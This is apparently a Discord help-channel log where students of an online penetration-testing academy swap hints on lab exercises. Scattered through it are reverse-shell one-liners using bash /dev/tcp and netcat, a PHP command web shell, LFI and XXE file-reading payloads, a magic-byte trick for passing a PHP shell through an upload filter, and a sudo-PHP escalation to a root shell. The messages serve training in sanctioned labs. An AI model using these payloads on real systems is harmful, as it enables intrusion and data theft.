#modules

1 messages · Page 17 of 1

bronze atlas
#

thank you i send it for you

polar nest
#

bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1

vital adder
#

that isn't a module

polar nest
#

└──╼ [★]$ bash -i >& /dev/tcp/10.10.14.44/1337 0>&1
bash: connect: Connection refused
bash: /dev/tcp/10.10.14.44/1337: Connection refused
is get hit with this error

polar nest
vital adder
polar nest
#

ohh okay

polar nest
vital adder
polar nest
#

ohh okay thank you

bronze atlas
#

with the awesomeness of @vital adder for helping me through the problem

timber hatch
#

any hints for local file inclusion fot the question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

lethal atlas
timber hatch
tight mesa
#

hello, anyone who can share a hint about the sqli HTB API..!!!

north ermine
#

Hi !

I am on Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I managed to import the good kerberos tickets and access the specified share and retrieve the flag. But it's marked as incorrect.

Does someone has the same issue ?

lyric quiver
#

Can you try this please, to see if this is only an issue for me

sly tapir
lethal atlas
#

I get an error’ “ERROR kuhl_m_sekurlsa_aquireLSA ; Handle on memory (0x000000005)”’

vital adder
#

this doesn't look like an privilege issue so i'm not sure if this going to help but did you run this before that?
privilege::debug
token::elevate

lethal atlas
vital adder
#

i think i learn that from some stuff on tryhackme

lethal atlas
vital adder
#

so did it work?

lethal atlas
#

Yeah after doing token::elevate

vital adder
#

oh

high totem
#

Hi everyone, question about Shells&Payloads module, PHP shell section - I've uploaded the shell file as described in the section, and can see the vendor/icon. However specified path /images/vendor/connect.php is not existing. Should I modify anything in the shell file?

lethal atlas
#

Not the strangest issue I have run into but still

vital adder
#

oh wait i just double check i think the mimikatz command i send use isn't in the section either

lethal atlas
#

No it’s not but I had found it on Google while researching the answer

#

But everyone I tried I got that error so I kept searching lol

high totem
#

Nvm, found the issue

shadow tiger
#

}Can someone explain if additional steps are needed to connect to some of the Fortresses modules? I'm interested in connecting to the AWS lab ... Those are designed for companies that want to host them. But I don't quite know how it works and AWS should be done using the AWS servers yet hackthebox is telling us to use their standard openvpn connection...

vital adder
#

in this a htb academy module?

fallow delta
#

anyone free for a nudge on AD Enum & Attack Assessment2?

timber hatch
#

hey guys
local file inclusion modul, section ¨basic bypass question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

the hint is: ||Try to see what path the regular functionality uses|| do I need to use ffuf for this?

timber hatch
#

i'm kind a lost here.. i know htb likes to make you feel like you have to put your head through a wall to learn something...but i would apreciate some help... 😉

timber hatch
#

somebody knows if that is in the near of the right solution?

||./language....//....//....//....//....//....//flag.txt%00||

#

or that:||language=languages....//....//....//....//....//....//....//....//flag.txt%00||

gleaming spindle
#

footprinting - lab easy

What I found until now:
* useful information in hint
* two file transfer services running on server
* ssh on server requires key authentication
The problem:
* i can interact with the file transfer services
but are totally empty. I don't know how to move from here

Any help will be really appreciated

magic valve
#

Hey everyone, I’m having issues receiving the credentials for rdp in the remote password attacks -Network Services. I have attempted hydra with the lists provided in the module but always get 2 server scans could not be completed error messages. Any nudges on what I am doing wrong would be greatly appreciated!

deep flume
#

Don't change the command from the module. You altered the dc. Keep it the same and make sure to do it from the attack machine they give you ssh access to.'

sturdy igloo
woeful oxide
#

Did u b64 encoded it ?

sturdy igloo
vital adder
vital adder
regal slate
#

hello

vital adder
#

hi sorry for leaving you hanging with some AD question the last few time (i didn't do that AD module) but i just finish this one and if you still need help you can use that example command but you just need to change the -Filter tag to *

timid pollen
vital adder
#

oh congratz

timid pollen
chilly nymph
#

a query, I'm doing my academy and some information seems to be outdated, because I try to apply them in the exercise and they don't work, an example would be in "module FILE INCLUSION, theme PHP Filters, The steps in the tutorial do not work"AngryPing

stuck hull
#

You probably should message a mod or staff member, this is a help channel for the Academy platform and I doubt the correct place for such a request

chilly nymph
#

I saw many errors in several courses at the academy, which does not allow me to advance

stuck hull
#

They have an 'erratum' channel that corrects minor errors. On the left panel just below this channel

chilly nymph
#

actually it is in the beginning, I thought it was my mistake, but I saw on youtube how others did the same step as me and if it worked for them, and I saw in the comments that several have that error

stuck hull
#

What is the error? On which module?

#

Maybe someone here could help

chilly nymph
#

after doing /etc/passwd

chilly nymph
stuck hull
#

That module is more than half way through the Pen Tester path, which is farther than I've got - so unfortunately I won't be able to help but I'm sure someone here will.

chilly nymph
echo zenith
stuck hull
unreal patio
#

Does any of the buffer overflow modules go into heap exploitation?

gleaming spindle
rustic sage
#

ØØØØØØØØØØØØØØØØØØØØ

patent crow
#

Hello @everyone

spice onyx
#

Hey All! I'm completely stuck on the following question, in the footprinting module: Enumerate the SMTP service even further and find the username that exists on the system. I have used nmap, metasploit, and smtp-user-enum all to no avail. I've logged in and poked around but I'm quite stuck. Other than trying another wordlist, which I tried a couple of iterations, I have no clue. What's more frustrating is that I've finished everything in the footprinting module (including the hard labs), and realized I had missed this single module. Assistance and pointers would be greatly appreciated!

unreal patio
#

@spice onyx have you used a wordlist with smtp-user-enum?

spice onyx
#

oh my gawd

unreal patio
#

You mentioned you used wordlists but not if it was the provided one

spice onyx
#

I totally missed that download - I was searching for others

#

Thanks so much. I'll run with that and try

unreal patio
#

Should be a breeze now

autumn pilot
#

careful with spoilers pls

spice onyx
# unreal patio Should be a breeze now

It still doesn't seem to find anything with smtp-enum. Running in verbose, and changing the timing too. I can see it's running through all the names...

unreal patio
#

@spice onyx smtp-enum?

spice onyx
#

I can see it's running through all 102 queries but no result

unreal patio
#

Have you read about the -w flag?

spice onyx
#

hmm I'm guessing no, but it just found it with metasploit and same list

unreal patio
#

🙂

spice onyx
#

I'll go try it with that as well, I was changing the timing but obviously I missed an option

#

Thanks so much - it was very annoying to only have this outstanding for the entire module! 🙂

pastel ginkgo
#

Is there a reason why crackmapexec is able to brute force smb on my target but when I use hydra it coes back with an invalid reply from target?

magic valve
magic valve
#

Hey all, I’m having issues on “Reverse Shell & Payloads” section in “The Live Engagement” module. I can’t login into the skills-foothold via NoMachine RDP. I’m inputting the password “HTB_@cademy_stdnt!” As stated in the module. Is this the incorrect password or am I suppose to find the password for the Foothold machine? Any help would be much appreciated! 🙂

iron basin
#

@magic valve it's a keyboard issue. Use the onscreen keyboard when you are trying to login when the terminal pops up after connecting through nomachine.

#

The onscreen keyboard should be top right of the terminal screen that pops up after logging in via RDP

magic cargo
#

nah not at all imo. Learning to google information is a great skill since noone remembers everything.

broken saffron
#

Hi there! Is anyone doing the sqlmal skills assessment module?

#

I'm stuck trying to find the vulnerable parameter I already tried manually so I can use it with sqlmap

chilly nymph
#

FILE INCLUSION/ PHP Filters :
help I get this command to apply it in the exercise but it doesn't work :c
http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=config

#

I get blank, or do I have to find the way myself? :C

balmy radish
#

Almost all the example commands need to be modified for the exercise questions

#

If you're following one of the job role paths, I recommend doing the modules in order because they build on each other

chilly nymph
#

yes, I do the whole module in order

#

I'll keep looking how to fix it. :/

balmy radish
#

The cheat sheets are useful on the modules too. There is a fuzzing section in the cheat sheet on this one if you want a refresher on what the question is asking for.

chilly nymph
#

i did all those, Does everything work fine for you? Or do you still not have that module?

#

because my doubt now is, if that only happens to me, or to others too

balmy radish
#

I just went back and did it again, it still works for me

proud notch
#

Modul: Footprinting
Section: SMTP
HTB Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I've tried to use:
sudo nmap <IP> -p25 --script smtp-enum-users -v
msfocnsole: smtp_enum

I haven't found anything. I see the hint says there's a footprinting wordlist that I may be overlooking which could solve this. Am I missing something or is the list in some obscure location?

chilly nymph
covert vault
#

Hey there, looking for a little help in Password Attacks - Pass the Ticket (PtT) from Linux. The last required question reads: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Having trouble with locating the ticket

trail obsidian
#

Nvm, I'm dumber than a bag of rocks.

inland coral
#

@west canopy Thank you! ... re your helpful Aug 5, 2022 reply on determining OS from NMAP output.

lapis pivot
#

Hi guys ... How to convert Decimal number to RID for the active directory user

proud notch
#

Try enumerating anything you can’t get an axfr response from.

pearl island
languid ginkgo
#

Hello,
I'm bloqued at "Broken Authentication"->"Predictable Reset Token", can you help me in dm please.
I was set the timezone, convert the timestamp in millisecond(x*1000), concat the htbadmin string with the timestamp before the md5() function

covert vault
#

Could anybody help out in Password Attacks - Pass the Ticket (PtT) from Linux category? I am stuck on the last section

uneven dune
#

hello guys i have a question, why i cant unlock the sql inyection module ?, i click it but nothing happends

trail obsidian
#

Doing the File Inclusion Module: Basic Bypass. I have the flag displayed but it says it's incorrect. :C

Apparently the website inserted a space that I didn't see between the last character and the bracket...

opaque badger
#

I’m working on attacking Web Applications with FUFF and on the DNS records it talks about modifying the /etc/hosts with the command sudo sh -c ‘echo “SERVER_IP academy.htb” >> /etc/hosts’ . I was wondering if anyone could explain why this is necessary in more detail and could I mess up my kali machine doing this?

uneven dune
#

yes i have points

#

the cost is 10

#

and i have 36 i thing

sterile raft
#

[The Live Engagement] - [Issues interacting with Targets]
I was able to spawn the foothold server and I also could get into the spawned server but when I try to even ping from inside it to the targets ips it is not responding.
Checking the /etc/hosts the targets are already there:
||172.16.1.11 status.inlanefreight.local
172.16.1.12 blog.inlanefreight.local
10.129.201.134 lab.inlanefreight.local
||

Any tips ? 🙂 Thx!

verbal ice
sterile raft
pliant sage
#

Hello, quick question on the network services part of password attacks: am I really supposed to run crackmapexec through the user and pwd lists provided in the resources? Seems like a tremendous waste of time so I was wondering if there is another, smarter way of approaching the problem

placid quest
#

@pliant sage what is the problem

pliant sage
#

well the user and password lists are fairly long, and I have to repeat the process for 4 different services so it feels like it's going to take a whole lot of time

#

since it's just one section of one module I thought maybe there was an easier way of doing it

pliant sage
#

ok I have a new problem, in smbclient the command "ls" returns the following:NT_STATUS_NO_SUCH_FILE listing *

#

does anyone have a solution?

#

nvm figured it out

flint agate
#

Can somebody help me on file uploads skill assesment ?
I can't find a payload that works
My current payload gives me a 500 internal server error
Is that a step forward ?

unreal patio
flint agate
#

Thanks
But actually my problem is that I don't know how to upload the file

unreal patio
#

I haven't done that specific module... Thought you just needed the shell

flint agate
#

could be useful

unreal patio
#

I guess I can do it today.. I usually just use scp or http.server

#

But that implies ssh access 😅

burnt bronze
#

Hi this Channel is about Hacking Right?

unreal patio
#

@burnt bronze This channel is for the modules of the academy

flint agate
#

The thing is you need to use ||double extension|| and ||mime types|| but it is a lot of guessing I think
I don't really know when I am right or wrong

unreal patio
#

@flint agate what is the name of the module you're doing?

flint agate
vital adder
#

try <?php system('your command here'); ?>

flint agate
#

will do

flint agate
vital adder
#

so did it work? also what extensions and magic number are you using?

flint agate
#

now I am trying to upload it
I got another question the magic number for ||"jpg"|| is ÿØÿà␀␐JFIF␀␁ or ÿØÿà beacuse I used the shorter one

#

I tried to fuzz but it dosen't work

vital adder
#

just ÿØÿà

flint agate
#

I tried|| shell.phar%00.jpg|| and jpeg also but failed

vital adder
#

wait try just remove the %00 thing

#

for all of the section in this module i didn't have to use anything weird naming thing like this

flint agate
#

that was character injection

#

I think I might have an idea now after I saw this github

#

I tried to but magic numbers inside the php file but i seams that it dosen't work either

vital adder
#

if you are on linux and run file with your payload it should that payload an images or something like that if you put the magic number on the right way

#

oh here something like this

flint agate
#

it gives me ASCII text

#

tried a bunch of combinations

vital adder
#

and how did you put the magic number in?

flint agate
#

At the first line before the payload, I used mousepad

#

this are the numbers right|| ff d8 ff e0|| ?

vital adder
#

wait so you add that number to the first line??

flint agate
#

yes

vital adder
#

nope that isn't how you put magic number in

#

i have this pre-written down but i can't find it so give me a sec

flint agate
vital adder
#

oh here found it

1. make a txt payload on top add AAAA
2. open that txt file in a hex editor
3. in the hex editor change the value of (41 41 41 41) to (FF D8 FF E0)
4. save and change the extension from .txt to .phar.jpg
vital adder
flint agate
vital adder
#

no that's the end result after adding the magic number

flint agate
#

WOW

#

It worked

#

I used an online hex editor

#

but that was mind blowing 😱

#

I hope I can finish the assesment now 🫡

coral sundial
#

Ghex is a nice app to get familiar with, then when your happy, use one of the many terminal apps.

flint agate
#

can't you find the directory using ||dirbuster|| ?

vital adder
#

if you use a wordlist that have the right directory name then yes

flint agate
#

I know the upload directory from the comments in the chat history but how did you find it ?

#

where did you find this ?

vital adder
flint agate
#

the source code of ||/contact|| ? or|| /|| ?

#

I used the XXE of the previous exercise

vital adder
flint agate
#

This should do it
||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/"> ]>
<svg>&xxe;</svg>||
but do I need to change the file I upload again ?
I mean change the file to a svg and put the magic numbers again ?

vital adder
#

hint no you don't need to ||magic number|| or the ||.svg|| for this also the source is at the web root not the linux web root

flint agate
#

should I look for files like /conf or /root

vital adder
#

nope it at the web root

flint agate
#

I have no idea what you mean.
Is it|| #|| or a file ?

vital adder
#

shoot me dm i'll send you the payload

solar granite
#

Hey guys I need a hint for Web Attacks - Blind Data Exfiltration. I am can't seem to get a request with the contents of the file. I do get a request, but it doesn't have the content.

Edit: solved

Hint: ||make sure to reference the correct entity in your payload, even if it looks wrong||

vital adder
#

for the payload you ||<root>&content;</root>|| at the end also the need the index.php file but that is for decoding so if you can't get any call back at all then i think it's the first one

solar granite
vital adder
#

all i have in my note is remember to use it 🤣

#

oh wait in the did file thing have ENTITY content so my guess it have something to do with that maybe?

solar granite
balmy radish
surreal rain
solar granite
#

Hi guys, I need some help with the Web Attacks Skills Assessment. I am trying to ||change another user's password||, but I am getting Access Denied

Edit: solved

vital adder
#

hint it isn't ||POST|| also pls put that token into spoiler tag

solar granite
vital adder
#

hi guy, any hint for Active Directory LDAP - Skills Assessment question 3?

warm sand
#

hello, once rdp into the foothold machine how long does it usually take for the infrastructure to come up and become available? I've tried to ping the other machines but none of them seem to be up, not sure if I'm doing something wrong. Thank you

rare current
#

Hi

tiny ledge
#

Has anyone been able to do File Inclusion Skills Assessment, I feel like the '&cmd=pwd' poisoning should work, but It's not, and I'm not sure If i'm able to edit the nqinx files

vital adder
#

if you use single quote for the payload then that should work

rustic sage
#

Hey I need some help for the Login Brute Forcing module. I'm at the skills assessment website and I don't understand the hint.

#

It says You may reuse the username you found earlier. Make sure you got the correct fail string and parameters. But wich username are they talking about ? I've try both usernames from last exercices ||m.gates and b.gates|| and I found nothing

tiny ledge
#

This is what I'm trying to inject, and it doesn't seem to like my cmd attempts:

vital adder
vital adder
rustic sage
tiny ledge
rustic sage
#

can i dm you ?

vital adder
#

sure

vital adder
tiny ledge
vital adder
#

yea... you shouldn't do that because if you inject that the log system can't processes then the system or nginx will crash

tiny ledge
vital adder
rustic sage
#

Is there an admin that could help me with an issue regarding a module? There is definitely an issue with the lab that makes it impossible to solve

#

This is regarding the The Live Engagement section of the Shells & Payloads module. The foothold is unable to reach the targets. The corresponding network interface is missing..

tiny ledge
sturdy igloo
#

if someone can help with Limited File Uploads section of File Upload Attacks. says file uploaded successfully. but the output shows "This XML file does not appear to have any style information associated with it. The document tree is shown below. " and all i see below is <svg/>

sly shadow
#

Can anyone help me out with Attacking common services SMB? I keep downloading an empty file and bruteforcing creds aren't working with the provided wordlist

vital seal
rustic sage
#

So i'm stuck again for the login brute forcing module first question in Skills Assessment - Service Login As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

So I'm not sure what to use for the username for the password I created a list with cupp -i.

#

Good evening from Spain! anyone have solved the Active Subdomain enumeration module?! Been stuck for a while 😦

placid quest
#

@rustic sage what is the problem

rustic sage
#

Ive been trying with dig, nslookup but dont get much back... I added the IP to my etc/hosts file but still I get the "server can`t find" error

placid quest
#

@rustic sage did u brute force subdomain

rustic sage
#

I`m downloading wordlists to use with gobuster

rustic sage
timber hatch
#

Hi together, I join the asking club...
in the local file inclusion modul at the section php wrappers is this command:
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

to currl the php configurations...when i curl i'm able to curl the page but i see nowhere the base64 encoded configruations code like in the exmaple...

anybody knows why?

deep flume
#

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

#

Can someone help with this on the Active DIr Living off the Land mod

covert vault
#

Hey has anybody completed the newly updated sections added to Password Attacks?

sturdy igloo
#

need help with file uploads skills assessment. anyone available that i can dm to provide what i have so far?

covert vault
#

@north ermine Is it okay if I pm you regarding some of the previous questions you have asked?

sturdy igloo
#

Need Help File Uploads Skills Assessment. I am able to upload files according to Burp. I found the source code also. Just dont know how to read the source code to figure out how to finish the task (where is the file located)

livid wing
#

can someone please explain this command in details:
i know it shifts characters to produce a '/' however i do not understand how it works and i cant reuse it to shift new characters
echo $(tr '!-}' '"-~'<<<[);

pastel ginkgo
#

Can someone point me in the right direction for Password Attacks - Credential Hunting in Linux. || I used the hint and found I could list the shares of the ftp server with the hint u/pswd but I dont know where to go from here. Are we supposed to just brute force will? ||

rapid ember
#

What are you guys thoughts on the questions on HTB ACADEMY ? Sometimes I get really confusing trying to understand them ( some of them of course)

pastel ginkgo
#

Follow the motto Try Harder, google is your friend and personal research is required for id say about 60% of the questions

#

Also this Discord is a godsend

pastel ginkgo
#

Could someone help me on Password Attacks Credential hunting? || I've tried running a password mutation on the suggested password and brute forcing but I still cant get in. Can someone point me in the right direction? ||

sturdy igloo
#

@sterile hawk

sterile hawk
#

ty

sturdy igloo
#

yw

onyx rapids
wheat garden
#

module -password attacks, section- pass the hash , question "Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt." I found davids hash but not sure what tools or commands syntax im supposed to use to be able to access the share. Tried some commands from various online tutorials but none of them are working or giving errors. Anyone know what tool you need to use?

wheat garden
wheat garden
pastel ginkgo
wheat garden
pastel ginkgo
wheat garden
pastel ginkgo
#

Did exactly that

wheat garden
#

then buteforce with her username and the mutated list with hydra

#

ssh service

pastel ginkgo
#

Yup tried that x)

wheat garden
#

DM me

#

just guessing but think you may have made an error when making the mutated list

#

Did you already complete the questions about david in that section? I found his hash what tool are you supposed to use to pass a hash to access a share?

wheat garden
#

What module name and section you working on?

wide river
#

Module name: Shells&Payloads

Section name: Bind Shell

Question: SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.

Problem: I use bind shell to connect to both machine together, but i wait for a while and this is all i have, what is my problem?

tepid thicket
chilly nymph
#

How can I see the operating system?
nmap --script smb-os-discovery.nse -p445 10.10.10.40

#

I found this other one but it doesn't work either

#

sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139

placid quest
#

@chilly nymph use -O

chilly nymph
chilly nymph
# placid quest <@333616105979379712> use -O

Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: CEO-PC
| NetBIOS computer name: CEO-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-27T00:59:46+00:00


Why doesn't the result come out like the tutorial? version change?

placid quest
#

@chilly nymph Because everything changes

chilly nymph
placid quest
#

@chilly nymph np

#

@wide river the problem is that, that is not a blind shell because netcat has no e option

tardy stone
#

Hi, is the SG vpn server down? I can't download the configuration file

thorny crow
#

What’s the best channel for support? Trying to do the Shells & Payloads module, but the boxes are down

rustic sage
#

Good morning from Spain!!

echo zenith
rustic sage
#

Someone with a little hint in the information gathering web skills assesment!

deep flume
rustic sage
#

I`ve been stuck for a while with this one: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? Any hints appreciated 🙂

little whaleBOT
#

Please see your DMs for instructions on how to verify your HTB account.

astral sedge
#

Hi trying Attacking Common Services - Hard, couldn't figure out how to impersonate as another user? any pointers? ( I have found the linked server, in mssql studio as f****** but don't know what to do from here ) Solved it, but how are we actually supposed to find which user we can impersonate, that part for me was pure guesswork.

astral sedge
#

for anyone else who is stuck, once you have a rdp session you don't need to try different usernames and password combinations.

frigid monolith
#

can anyone give me a nudge on login brute forcing - skills assessment - website?

#

can't seem to find the right lists to use with hydra

unreal patio
#

module/115/section/1139
Shells & payloads // The Live Engagement

I can't seem to get nomachine running on port 4000 or 3389 so I can't even start with the challenge

unique valve
unreal patio
#

It's what I did

#

Just sad that nomachine is not working

unique valve
#

Nomachine was recently removed from that target due to continuous performance issues.

unreal patio
#

Oh 😦

unique valve
unreal patio
#

I just wanted to see how it worked

#

Never used it before 😁

#

Can someone give me a pointer on the machines? I seem unable to ping any of the machines from the foothold machine

vital adder
#

there is a lot of people having the same issue of the target machine down for the The Live Engagement right now and did check and that seem to be the case

#

i think they remove the lab with the nomachine replace it with an older lab or something

unreal patio
#

So I'm supposed to just wait for a fix from their side?

vital adder
#

this isn't the first time thing like this happen but for this i think yep

unreal patio
#

🤔

vital adder
#

also it seem like 2 out of 3 target is down but the third target network have some new ip that i don't think i did saw before (i don't have this part in my note so i'm not 100%) i didn't enum much with any of those ip but it could the domain in the hosts file get set to the wrong ip in this older lab
edit: nvm i think there an networking or something and new NoMachine is missing the tun0 interface "172.16.1.5" also i don't think the PRTG Network Monitor (APP03) i found is one of the target

unique valve
#

Have you tried spawning that challenge from another VPN?

vocal citrus
#

hi

vital adder
frigid monolith
#

rgr

#

thanks

dense sonnet
#

Ay guys how you doing
I've been stuck for the past couple of days on the second task of "knowledge check" section in the "Getting Started" module. The hint says try running linenum or linpeas but I can't download them on the machine as I have almost no permissions on it. Any hints/help?

placid quest
#

@dense sonnet use wget

dense sonnet
#

tried it, I don't have permission to write any files.

#

tried to wget from my local machine and from the internet, permission denied.

placid quest
#

@dense sonnet try to use sudo -l

dense sonnet
#

yea i tried it too it just shows that I can use /usr/bin/php without a password

placid quest
#

@dense sonnet php may lead to privileges escalation

dense sonnet
#

isn't /usr/bin/php just a directory?

#

when I click enter to run the command it just keeps going one line down without doing anything

placid quest
#

@dense sonnet use CMD="/bin/sh"
sudo php -r "system('$CMD');"

solar granite
#

Hi guys, I need some help with attacking common applications - joomla discovery and enumeration. I am trying to brute-force the admin user password at http://app.inlanefreight.local/<SPOILER>, but the script shown in the lesson takes forever (doesn't seem to work)

Edit: solved. I was using the wrong wordlist.

Hint: ||use the same wordlist as shown in the lesson||

rustic sage
#

Hi, I am just at the skills assesment, but I do not have answers to some questions, it may be strange, but the questions for me are vague

Windows Privilege Escalation =>
Initial Enumeration =>
=> What non-default privilege does the htb-student user have?

=> Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

#

thank you 🙂

warm sand
#

Any admin for The Live Engagement on shells&payloads? the network seems down, at least from what i can tell..if someone can check that and let me know..thank you

rustic crater
#

hello

#

i need help

coral sundial
# rustic crater hello

Just ask and explain your issue with some details that should include module and screenshots if possible.

rustic crater
#

just started what is the ans of last question of MEOW(Submit root flag)

coral sundial
rustic crater
#

ok

coral sundial
#

But you need to log on to the machine and get the flag

rustic crater
#

ok

coral sundial
#

Think about the port you found with nmap and what tool you would use to access it.

static pine
dense sonnet
#

just gives me nothing and lets me go down lines

cerulean silo
#

Can someone tell me

#

how to get the flag in this

#

i got the username and password

#

authentication also done

#

but how to read emails in smtp

#

Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

#

THis is the question

#

which email are they talking about?

tired halo
#

Solved. With a small changes it worked... but only in pwnbox.

frigid summitBOT
balmy radish
cerulean silo
#

yeah

#

imap and pop3 i can use

#

i learnt that

#

didnt see commands to read in nmap so stopped

#

will check again

#

thanks

balmy radish
#

yw

warm gull
#

:< i feel sad, my connection got lost after completing the Meow stage

rustic sage
#

Hello from Spain!

#

I`m looking for some hints with the 3rd question of the web skills assesment! the "servers name" of i.igmur :/ :/

onyx rapids
#

Can you PM the folder? I'm too lazy to go through 100 folder manually, this isn't hacking lol

placid quest
#

@rustic sage use brup suite

rustic sage
#

Ok Crean, I`m on my way!

unreal patio
#

@warm sand Did you manage to progress with Shells & Payloads?

#

I'm stuck unable to ping even the first host

rustic sage
#

Im in burp suite but the browser doesnt open the i.igmur.com... and the scan gives me back little information

placid quest
#

@rustic sage if it is not working use curl

rustic sage
#

Ive tried curl with the i.igmur and the relocated name but I dont see the servers name... for what Ive read in the forums Im not understanding the questions...

placid quest
#

@rustic sage use curl -i

rustic sage
#

I have used -i and -I and nslookup and dig commands...

vital adder
onyx rapids
unreal patio
#

I'm waiting on support now for an answer

vital adder
vital adder
# unreal patio I'm waiting on support now for an answer

oh try refresh the page if you got nothing back from support for a while also the nomachine is missing an network interface (tun0 / 172.16.1.5) and 2 out of 3 target machine is on 172.16.1.0/23 so i think that's why the nomachine can't access the target

rustic sage
covert vault
#

Has anybody finished up the last newly added sections for Password Attacks - Pass the Ticket: Linux?

vital adder
vital adder
rustic sage
vital adder
#

i just try and you can still get the right answer

#

shoot me a dm with your command

unreal patio
#

@vital adder Tried to find tun0 but no success and I've been in queue for support 18 minutes so far

vital adder
#

oh the refresh thing is just to see if you got new message or not and yes tun0 is missing on the nomachine

charred pawn
#

I been stuck on hacking wordpress login section if somebody could point me in the right direction

covert vault
# vital adder yep i did also what's the issue?

I was able to find the ||keytab file within /etc/krb5.keytab|| and tried impersonating that user to log in via smb but had no luck with it. Am I expected to crack the NTLM hash? Also tried kinit but it said something along the lines of lack of credentials within the keytab file

vital adder
#

no but after impersonating using that ||keytab|| file what command did you try to get the flag

charred pawn
covert vault
vital adder
#

also here is the format for this kinit (username) -k -t ||keytab file||

vital adder
vital adder
covert vault
charred pawn
vital adder
covert vault
#

WIll do thanks

sand mauve
#

Hi

placid quest
#

@sand mauve hei

wide river
leaden quail
#

hey guys im struggel with the passwort attack task: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.

placid quest
#

@wide river target

leaden quail
#

used multiple rules list with the user sam but nothing works

placid quest
#

@leaden quail what is the problem

leaden quail
#

brute forcing for hours with hydra... seems im doing something wrong

#

but i follow the instructuions

wide river
placid quest
#

@wide river nc <attacker-ip> <port> -e /bin/bash

wide river
unreal patio
#

rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b

unreal patio
#

😊

wide river
unreal patio
#

That on the target machine

#

and nc -lvnp port on your machine

wide river
#

oh wait..

#

lemme do that again

unreal patio
#

Haha

wide river
wide river
#

am i do it correctly?

unreal patio
#

You made 2 tiny mistakes

#

In the first command you specify 430 and you're listening on 443 on the other machine

#

And you're writing it as two command while you have to pipe them

#

Are you getting a shell or not?

#

Does whoami give you an output?

wide river
#

im redoing it again..

#

and..

#

this is where im at right now

#

and typing command dont return anything

unreal patio
#

Ok

#

So you want to run a listener on your hades machine

#

which is nc -lvnp port

#

And then you try to get the htb-student machine to conect to it via a command

wide river
#

so the bind shell suppose to have listener on my hades machine ?

unreal patio
#

Oh bind shell

#

nc -lvnp port -e /bin/bash

wide river
#

on my hades machine ?

unreal patio
#

listener should be on the target machine if you want a bind shell

wide river
unreal patio
#

And you already ran the command in the module?

#
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l IP PORT > /tmp/f```
wide river
#

with that command

#

the IP and the PORT is for the target or my machine

placid quest
#

@wide river use nc ip address port -e /bin/bash on the target and use nc -lvnp ip address port on ur local machine

placid quest
#

@wide river yes

zealous belfry
#

somebody did the shells and payload skill assesment ? For me its completely broken with freerdp. Its hella slow, and the internal ips are not working

unreal patio
#

@zealous belfry Bunch of people have this issue, apparently the tun0 adapter from the machine is gone

#

I'm trying to chat with support but I've been in queue for 1h so far

zealous belfry
#

aw yikes..

#

before they used nomachine which was a pain as well..

charred pawn
#

someone help me out with hacking wordpress? Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer. maybe can send me a url to something that helps explain wordpress xmlrpc attacks?

thorny valve
#

Any clues for the "getting started" privilege escalation. switching from user1 to user2. Ran linpeass and tried dirtycow and dirtypipe neither worked due to glibc not being found.
I feel like its easier cause its in the getting started section but Im not seeing it any help is appreciated

warm sand
#

Hello! for the AD Enumeration skill assessment I can i get some help on how to get the cleartext credentials for another domain user? Thank you.

charred pawn
thorny valve
#

just dont forget the port and uri for msf

urban valley
#

Hi, for AD LDAP "Credentialed LDAP Enumeration", does anyone know how to authenticate to the IP? Im getting this screen when I try to RDP:

placid quest
#

@charred pawn what is the problem

charred pawn
#

not sure how to list all possible method calls using curl post

balmy radish
#

The hint will tell you. If you don't understand the hint, you can google info about the hint

charred pawn
#

I wish

#

im trying curl -s -X POST -d "<methodCall><methodName>'system.listMethods'

balmy radish
waxen barn
#

This Firewall and IDS/IPS Evasion (hard) module is driving me insane

#

I found the tcpwrapped service on port 50000. I can't figure out the version.

#

It shows either tcpwrapped or ibm-db

deft pebble
#

hey, I am new here, is this the right channel to ask question about "Starting Point boxes"?

#

Hi @bleak compass, I run into the same issue... password is not working ... did you work it out somehow?

rustic sage
bleak compass
deft pebble
zealous belfry
wind acorn
#

for some reason i cant spawn a module'

#

it say i already have one open

#

and i dont know how to see the one that is open

balmy radish
wind acorn
balmy radish
#

I’m not sure then. I’ve never seen that issue with Academy

wind acorn
#

ok

#

should i just make an new account?

#

and start over

charred pawn
#

